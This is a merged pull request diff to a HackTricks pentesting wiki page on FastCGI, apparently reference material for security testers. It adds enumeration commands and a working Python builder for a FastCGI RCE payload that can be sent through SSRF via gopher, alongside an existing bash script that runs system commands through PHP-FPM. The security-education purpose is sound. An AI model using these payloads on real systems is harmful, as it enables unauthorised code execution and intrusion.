Merge pull request #1856 from HackTricks-wiki/research_update_src_network-services-pentesting_9000-pentesting-fastcgi_20260204_023422

Research Update Enhanced src/network-services-pentesting/900...

Author: carlospolop

src/network-services-pentesting/9000-pentesting-fastcgi.md

@@ -13,14 +13,24 @@ pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedi
 
 By default **FastCGI** run in **port** **9000** and isn't recognized by nmap. **Usually** FastCGI only listen in **localhost**.
 
+## Enumeration / Quick checks
+
+* **Port scan:** `nmap -sV -p9000 <target>` (will often show "unknown" service; manually test).
+* **Probe FPM status page:** `SCRIPT_FILENAME=/status SCRIPT_NAME=/status REQUEST_METHOD=GET cgi-fcgi -bind -connect 127.0.0.1:9000` (default php-fpm `pm.status_path`).
+* **Find reachable sockets via SSRF:** if an HTTP service is exploitable for SSRF, try `gopher://127.0.0.1:9000/_...` payloads to hit the FastCGI listener.
+* **Nginx misconfigs:** `cgi.fix_pathinfo=1` with `fastcgi_split_path_info` errors let you append `/.php` to static files and reach PHP (code exec via traversal).
+
 ## RCE
 
 It's quite easy to make FastCGI execute arbitrary code:
 
+<details>
+<summary>Send FastCGI request that prepends PHP payload</summary>
+
 ```bash
 #!/bin/bash
 
-PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
+PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';" 
 FILENAMES="/var/www/public/index.php" # Exisiting file path
 
 HOST=$1
@@ -37,8 +47,56 @@ for FN in $FILENAMES; do
 done
 ```
 
+</details>
+
 or you can also use the following python script: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
 
-{{#include ../banners/hacktricks-training.md}}
+### SSRF/gopher to FastCGI (when 9000 is not directly reachable)
+
+If you only control an **SSRF** primitive, you can still hit FastCGI using the gopher scheme and craft a full FastCGI request. Example payload builder:
+
+<details>
+<summary>Build and send a gopher FastCGI RCE payload</summary>
+
+```python
+import struct, socket
+host, port = "127.0.0.1", 9000
+params = {
+    b"REQUEST_METHOD": b"POST",
+    b"SCRIPT_FILENAME": b"/var/www/html/index.php",
+    b"PHP_VALUE": b"auto_prepend_file=php://input\nallow_url_include=1"
+}
+body = b"<?php system('id'); ?>"
+
+def rec(rec_type, content, req_id=1):
+    return struct.pack("!BBHHBB", 1, rec_type, req_id, len(content), 0, 0) + content
+
+def enc_params(d):
+    out = b""
+    for k, v in d.items():
+        out += struct.pack("!B", len(k)) + struct.pack("!B", len(v)) + k + v
+    return out
+payload  = rec(4, enc_params(params)) + rec(4, b"")  # FCGI_PARAMS + terminator
+payload += rec(5, body)                                # FCGI_STDIN
+
+s = socket.create_connection((host, port))
+s.sendall(payload)
+print(s.recv(4096))
+```
 
+Convert `payload` to URL-safe base64/percent-encoding and send via `gopher://host:9000/_<payload>` in your SSRF.
+</details>
 
+### Notes on recent issues
+
+* **libfcgi <= 2.4.4 integer overflow (2024):** crafted `nameLen`/`valueLen` in FastCGI records can overflow on 32‑bit builds (common in embedded/IoT), yielding heap RCE when the FastCGI socket is reachable (directly or via SSRF).
+* **PHP-FPM log manipulation (CVE-2024-9026):** when `catch_workers_output = yes`, attackers who can send FastCGI requests may truncate or inject up to 4 bytes per log line to erase indicators or poison logs.
+* **Classic Nginx + cgi.fix_pathinfo misconfig:** still widely seen; if `fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;` is used without file existence checks, any path ending in `.php` gets executed, enabling path traversal or source overwrite style gadgets.
+
+
+
+## References
+
+* [FastCGI library integer overflow leading to RCE](https://cybersecuritynews.com/fastcgi-integer-overflow-flaw/)
+* [CVE-2024-9026 PHP-FPM log manipulation analysis](https://cyrisk.com/security/cve-2024-9026-log-manipulation/)
+{{#include ../banners/hacktricks-training.md}}